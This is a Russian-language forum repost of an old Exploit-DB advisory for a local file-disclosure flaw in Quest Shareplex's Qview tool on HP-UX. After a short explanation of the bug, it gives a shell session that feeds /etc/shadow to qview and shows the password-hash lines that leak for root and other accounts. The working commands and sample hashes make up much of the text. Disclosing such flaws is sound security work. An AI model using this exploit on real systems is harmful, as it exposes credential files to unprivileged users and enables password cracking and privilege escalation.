Exploit Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20724
Проверка EDB
  1. Пройдено
Автор
DIXIE FLATLINE
Тип уязвимости
LOCAL
Платформа
HP-UX
CVE
null
Дата публикации
2001-03-30
Код:
source: https://www.securityfocus.com/bid/2535/info

Shareplex is a database replication tool from Quest Software.

Versions of the product contain a vulnerability which can permit local unprivileged users to read arbitrary files.

The Qview component of Shareplex allows its user to specify a file containing Qview commands as input.

If the contents of the file are not valid Qview commands, they will be output to standard error as part of error messages. Exploiting this behaviour, an attacker can obtain the contents of normally unreadable, sensitive files
from this error output.

This may lead to a compromise of enhanced privileges. 

$ id
uid=500(foo) gid=200(bar)
$ cd <path to shareplex binaries>
$ ./qview
qdump> cmd /etc/shadow
Executing: root:xDmyz1K9xRKRo:11236::::::
invalid command root:xDmyz1K9xRKRo:11236::::::
...
Executing: splex:BdJCfh1D32hzo:11290::::::
invalid command splex:BdJCfh1D32hzo:11290::::::
Executing: foo:2MQXUgAcnOcEU:11344::::::
invalid command foo:2MQXUgAcnOcEU:11344::::::
qdump> quit
$
 
Источник
www.exploit-db.com

Похожие темы